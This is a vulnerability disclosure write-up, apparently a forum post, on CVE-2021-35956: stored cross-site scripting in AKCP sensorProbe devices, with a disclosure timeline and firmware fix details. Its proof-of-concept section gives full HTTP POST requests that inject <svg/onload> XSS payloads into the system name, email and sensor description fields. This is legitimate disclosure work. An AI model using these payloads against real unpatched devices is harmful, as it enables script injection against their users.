CVE-2021-35956 AKCP sensorProbe - 'Multiple' Cross Site Scripting (XSS)

Back in June, I finally get my first CVE vulnerability assigned by Mitre, CVE-2021-35956 details multiple stored cross-site scripting (XSS) vulnerabilities I discovered in the AKCP sensorProbe embedded webserver. In this post, I’ll describe the technical details of the vulnerability, the vendor’s response, and remediation options. Overall AKCP was an exceptional partner in the responsible disclosure process, remediating the issue quickly and providing me with a test unit to verify the updated firmware.

Index

:stopwatch: Disclosure Timeline

I attempt to find a security contact at AKCP, could not do so, and contacted the sales team at [email protected]
29 May 2021

I recieve response from management, and release my responsible disclosure report
29 May 2021

AKCP provides me a copy of beta test firmware for the fix
15 June 2021

AKCP provides me an ip address for a test unit to verify the fix, I confirm the vulnerability has been fixed
16 June 2021

AKCP releases updated firmware on their website and updates their changelog mentioning the XSS vulnerability
25 June 2021

I submit a request for CVE through Mitre's submission form
28 June 2021

Mitre reserves CVE-2021-35956 for the vulnerability
29 June 2021

:bulb: About the Vendor

AKCP is a sensor manufacturer developing network-based temperature, enviorment, and power monitoring devices. Their clients include big names like Nasa, Coca-cola, Toyota, Adobe, and much more. Their most popular devices include the sensorProbe, securityProbe, and AKCPro Server. This research identifies multiple stored cross-site scripting vulnerabilities in all sensorProbe devices. According to AKCP, the sensorProbe devices are,

“the worlds most installed Remote Environmental Sensor Monitoring Device … deployed in a wide variety of industries including Data Center Environmental Monitoring, Warehouse Temperature Monitoring, Cold Storage Temperature Monitoring, Fuel / Generator Monitoring, and other Remote Site Monitoring applications.”

:sos: CVE-2021-35956 Vulnerability Details

All sensorProbe devices prior to firmware version SP480-20210624 are vulnerable to authenticated stored cross-site scripting via the Sensor Description, Email, and System setting fields. Authenticated users can introduce arbitrary javascript through the vulnerable fields, and have payloads execute in the context of users who visit the sensorProbe embedded webserver dashboard. While stored XSS can be dangerous, this vulnerability requires the attacker to already be authenticated in order to store payloads.

The following section identifies proof of concepts for each vulnerable field

Stored Cross-Site Scripting via System Settings

The sensorProbe embedded web server is vulnerable to authenticated stored cross-site scripting via the system name and system location parameters in system settings.

Payload: <svg/onload=alert`xss`>

Proof of Concept

POST /system?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/system?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save

2) Stored Cross-Site Scripting via Email Settings

The sensorProbe embedded web server is vulnerable to authenticated stored cross-site scripting via the mail from, mail to, and mail cc parameters in email settings.

Proof of Concept

POST /mail?time=32e004c941f912 HTTP/1.1
Content-Length: 162
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/mail?time=32e004c941f912

[email protected]&[email protected]&[email protected]&[email protected]&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save

3) Stored Cross-Site Scripting via Sensor Description

The sensorProbe embedded web server is vulnerable to authenticated stored cross-site scripting via sensor settings description parameter for each of the sensor options.

Proof of Concept

POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
Content-Length: 55
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
Cookie: CPCookie=sensors=400

_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save

:rocket: Firmware Upgrade

As of Friday June 25th, SensorProbe users can upgrade their devices to SP480-20210624 according to AKCP standards outlined in the firmware download page.

Firmware Update – Download – release date 28 June 2021
Latest Firmware – SP480-20210624
Note: To download files, right-click on the file and select “save as”
md5sum: 83f107f274ed6fda2cd5aa0f21935a98

IMPORTANT NOTE: The sensorProbe2 & SP8 units with the Atmega128 micro-controller (SPxxxi) do not support this firmware version. You can check your units micro-controller version in the web interface System page >> System Description. If you see an “I” after the firmware version (SPxxxi) then your unit is using the older Atmega128 micro-controller. Please see below for the latest firmware for your SP8 base unit.

Nice! @tcbutler320

Damn that form looks dangerous :joy: nice find and good work doing a full responsible disclosure with the vendor

4 Likes

Fantastic work! Love to see it.

2 Likes

Good stuff @tcbutler320! Great work on the write-up too <3

1 Like